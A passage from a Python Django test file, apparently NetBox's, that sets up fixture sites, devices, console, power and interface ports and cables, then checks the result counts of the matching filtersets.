Device.objects.filter(pk=devices[1].pk).update(virtual_chassis=virtual_chassis, vc_position=2, vc_priority=2)
def test_name(self):
params = {'name': ['Device 1', 'Device 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_asset_tag(self):
params = {'asset_tag': ['1001', '1002']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_face(self):
params = {'face': DeviceFaceChoices.FACE_FRONT}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_position(self):
params = {'position': [1, 2]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_vc_position(self):
params = {'vc_position': [1, 2]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_vc_priority(self):
params = {'vc_priority': [1, 2]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_manufacturer(self):
manufacturers = Manufacturer.objects.all()[:2]
params = {'manufacturer_id': [manufacturers[0].pk, manufacturers[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'manufacturer': [manufacturers[0].slug, manufacturers[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype(self):
device_types = DeviceType.objects.all()[:2]
params = {'device_type_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicerole(self):
device_roles = DeviceRole.objects.all()[:2]
params = {'role_id': [device_roles[0].pk, device_roles[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'role': [device_roles[0].slug, device_roles[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_platform(self):
platforms = Platform.objects.all()[:2]
params = {'platform_id': [platforms[0].pk, platforms[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'platform': [platforms[0].slug, platforms[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_rack(self):
racks = Rack.objects.all()[:2]
params = {'rack_id': [racks[0].pk, racks[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cluster(self):
clusters = Cluster.objects.all()[:2]
params = {'cluster_id': [clusters[0].pk, clusters[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_model(self):
params = {'model': ['model-1', 'model-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_status(self):
params = {'status': [DeviceStatusChoices.STATUS_ACTIVE, DeviceStatusChoices.STATUS_STAGED]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_is_full_depth(self):
params = {'is_full_depth': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'is_full_depth': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_airflow(self):
params = {'airflow': DeviceAirflowChoices.AIRFLOW_FRONT_TO_REAR}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_mac_address(self):
params = {'mac_address': ['00-00-00-00-00-01', '00-00-00-00-00-02']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_serial(self):
params = {'serial': ['ABC', 'DEF']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'serial': ['abc', 'def']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_has_primary_ip(self):
params = {'has_primary_ip': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'has_primary_ip': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_virtual_chassis_id(self):
params = {'virtual_chassis_id': [VirtualChassis.objects.first().pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_virtual_chassis_member(self):
params = {'virtual_chassis_member': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'virtual_chassis_member': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_console_ports(self):
params = {'console_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'console_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_console_server_ports(self):
params = {'console_server_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'console_server_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_power_ports(self):
params = {'power_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'power_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_power_outlets(self):
params = {'power_outlets': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'power_outlets': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_interfaces(self):
params = {'interfaces': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'interfaces': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_pass_through_ports(self):
params = {'pass_through_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'pass_through_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_device_bays(self):
params = {'device_bays': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device_bays': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_local_context_data(self):
params = {'local_context_data': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
params = {'local_context_data': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant(self):
tenants = Tenant.objects.all()[:2]
params = {'tenant_id': [tenants[0].pk, tenants[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant': [tenants[0].slug, tenants[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant_group(self):
tenant_groups = TenantGroup.objects.all()[:2]
params = {'tenant_group_id': [tenant_groups[0].pk, tenant_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant_group': [tenant_groups[0].slug, tenant_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
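# ConsolePort filtering: port attributes, device/site topology, and cable state.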
class ConsolePortTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = ConsolePort.objects.all()
filterset = ConsolePortFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
console_server_ports = (
ConsoleServerPort(device=devices[3], name='Console Server Port 1'),
ConsoleServerPort(device=devices[3], name='Console Server Port 2'),
)
ConsoleServerPort.objects.bulk_create(console_server_ports)
console_ports = (
ConsolePort(device=devices[0], name='Console Port 1', label='A', description='First'),
ConsolePort(device=devices[1], name='Console Port 2', label='B', description='Second'),
ConsolePort(device=devices[2], name='Console Port 3', label='C', description='Third'),
)
ConsolePort.objects.bulk_create(console_ports)
# Cables
Cable(termination_a=console_ports[0], termination_b=console_server_ports[0]).save()
Cable(termination_a=console_ports[1], termination_b=console_server_ports[1]).save()
# Third port is not connected
def test_name(self):
params = {'name': ['Console Port 1', 'Console Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_connected(self):
params = {'connected': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'connected': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
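# ConsoleServerPort filtering: port attributes, device/site topology, and cable state.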
class ConsoleServerPortTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = ConsoleServerPort.objects.all()
filterset = ConsoleServerPortFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
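        # ConsolePorts on the unnamed device serve purely as cable peers; note that they
        # are named after the console server ports they will be cabled to.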
console_ports = (
ConsolePort(device=devices[3], name='Console Server Port 1'),
ConsolePort(device=devices[3], name='Console Server Port 2'),
)
ConsolePort.objects.bulk_create(console_ports)
console_server_ports = (
ConsoleServerPort(device=devices[0], name='Console Server Port 1', label='A', description='First'),
ConsoleServerPort(device=devices[1], name='Console Server Port 2', label='B', description='Second'),
ConsoleServerPort(device=devices[2], name='Console Server Port 3', label='C', description='Third'),
)
ConsoleServerPort.objects.bulk_create(console_server_ports)
# Cables
Cable(termination_a=console_server_ports[0], termination_b=console_ports[0]).save()
Cable(termination_a=console_server_ports[1], termination_b=console_ports[1]).save()
# Third port is not connected
def test_name(self):
params = {'name': ['Console Server Port 1', 'Console Server Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_connected(self):
params = {'connected': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'connected': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
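# PowerPort filtering: port attributes (including draw values), topology, and cable state.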
class PowerPortTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = PowerPort.objects.all()
filterset = PowerPortFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
power_outlets = (
PowerOutlet(device=devices[3], name='Power Outlet 1'),
PowerOutlet(device=devices[3], name='Power Outlet 2'),
)
PowerOutlet.objects.bulk_create(power_outlets)
power_ports = (
PowerPort(device=devices[0], name='Power Port 1', label='A', maximum_draw=100, allocated_draw=50, description='First'),
PowerPort(device=devices[1], name='Power Port 2', label='B', maximum_draw=200, allocated_draw=100, description='Second'),
PowerPort(device=devices[2], name='Power Port 3', label='C', maximum_draw=300, allocated_draw=150, description='Third'),
)
PowerPort.objects.bulk_create(power_ports)
# Cables
Cable(termination_a=power_ports[0], termination_b=power_outlets[0]).save()
Cable(termination_a=power_ports[1], termination_b=power_outlets[1]).save()
# Third port is not connected
def test_name(self):
params = {'name': ['Power Port 1', 'Power Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_maximum_draw(self):
params = {'maximum_draw': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_allocated_draw(self):
params = {'allocated_draw': [50, 100]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_connected(self):
params = {'connected': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'connected': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
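# PowerOutlet filtering: port attributes (including feed leg), topology, and cable state.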
class PowerOutletTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = PowerOutlet.objects.all()
filterset = PowerOutletFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
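        # PowerPorts on the unnamed device serve purely as cable peers; note that they
        # are named after the power outlets they will be cabled to.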
power_ports = (
PowerPort(device=devices[3], name='Power Outlet 1'),
PowerPort(device=devices[3], name='Power Outlet 2'),
)
PowerPort.objects.bulk_create(power_ports)
power_outlets = (
PowerOutlet(device=devices[0], name='Power Outlet 1', label='A', feed_leg=PowerOutletFeedLegChoices.FEED_LEG_A, description='First'),
PowerOutlet(device=devices[1], name='Power Outlet 2', label='B', feed_leg=PowerOutletFeedLegChoices.FEED_LEG_B, description='Second'),
PowerOutlet(device=devices[2], name='Power Outlet 3', label='C', feed_leg=PowerOutletFeedLegChoices.FEED_LEG_C, description='Third'),
)
PowerOutlet.objects.bulk_create(power_outlets)
# Cables
Cable(termination_a=power_outlets[0], termination_b=power_ports[0]).save()
Cable(termination_a=power_outlets[1], termination_b=power_ports[1]).save()
# Third port is not connected
def test_name(self):
params = {'name': ['Power Outlet 1', 'Power Outlet 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_label(self):
params = {'label': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['First', 'Second']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_feed_leg(self):
params = {'feed_leg': [PowerOutletFeedLegChoices.FEED_LEG_A, PowerOutletFeedLegChoices.FEED_LEG_B]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_connected(self):
params = {'connected': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'connected': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_device(self):
devices = Device.objects.all()[:2]
params = {'device_id': [devices[0].pk, devices[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device': [devices[0].name, devices[1].name]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
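# Interface filtering: attributes, parent/bridge/LAG hierarchy, wireless properties,
# topology, and cable state.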
class InterfaceTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Interface.objects.all()
filterset = InterfaceFilterSet
@classmethod
def setUpTestData(cls):
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = Site.objects.bulk_create((
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
Site(name='Site X', slug='site-x'),
))
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model 1', slug='model-1')
device_role = DeviceRole.objects.create(name='Device Role 1', slug='device-role-1')
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
devices = (
Device(name='Device 1', device_type=device_type, device_role=device_role, site=sites[0], location=locations[0]),
Device(name='Device 2', device_type=device_type, device_role=device_role, site=sites[1], location=locations[1]),
Device(name='Device 3', device_type=device_type, device_role=device_role, site=sites[2], location=locations[2]),
Device(name=None, device_type=device_type, device_role=device_role, site=sites[3]), # For cable connections
)
Device.objects.bulk_create(devices)
# VirtualChassis assignment for filtering
virtual_chassis = VirtualChassis.objects.create(master=devices[0])
Device.objects.filter(pk=devices[0].pk).update(virtual_chassis=virtual_chassis, vc_position=1, vc_priority=1)
Device.objects.filter(pk=devices[1].pk).update(virtual_chassis=virtual_chassis, vc_position=2, vc_priority=2)
        interfaces = (
            Interface(device=devices[0], name='Interface 1', label='A', type=InterfaceTypeChoices.TYPE_1GE_SFP, enabled=True,
                      mgmt_only=True, mtu=100, mode=InterfaceModeChoices.MODE_ACCESS, mac_address='00-00-00-00-00-01',
                      description='First'),
            Interface(device=devices[1], name='Interface 2', label='B', type=InterfaceTypeChoices.TYPE_1GE_GBIC, enabled=True,
                      mgmt_only=True, mtu=200, mode=InterfaceModeChoices.MODE_TAGGED, mac_address='00-00-00-00-00-02',
                      description='Second'),
            Interface(device=devices[2], name='Interface 3', label='C', type=InterfaceTypeChoices.TYPE_1GE_FIXED, enabled=False,
                      mgmt_only=False, mtu=300, mode=InterfaceModeChoices.MODE_TAGGED_ALL, mac_address='00-00-00-00-00-03',
                      description='Third'),
            Interface(device=devices[3], name='Interface 4', label='D', type=InterfaceTypeChoices.TYPE_OTHER, enabled=True,
                      mgmt_only=True, tx_power=40),
            Interface(device=devices[3], name='Interface 5', label='E', type=InterfaceTypeChoices.TYPE_OTHER, enabled=True,
                      mgmt_only=True, tx_power=40),
            Interface(device=devices[3], name='Interface 6', label='F', type=InterfaceTypeChoices.TYPE_OTHER, enabled=False,
                      mgmt_only=False, tx_power=40),
            Interface(device=devices[3], name='Interface 7', type=InterfaceTypeChoices.TYPE_80211AC,
                      rf_role=WirelessRoleChoices.ROLE_AP, rf_channel=WirelessChannelChoices.CHANNEL_24G_1,
                      rf_channel_frequency=2412, rf_channel_width=22),
            Interface(device=devices[3], name='Interface 8', type=InterfaceTypeChoices.TYPE_80211AC,
                      rf_role=WirelessRoleChoices.ROLE_STATION, rf_channel=WirelessChannelChoices.CHANNEL_5G_32,
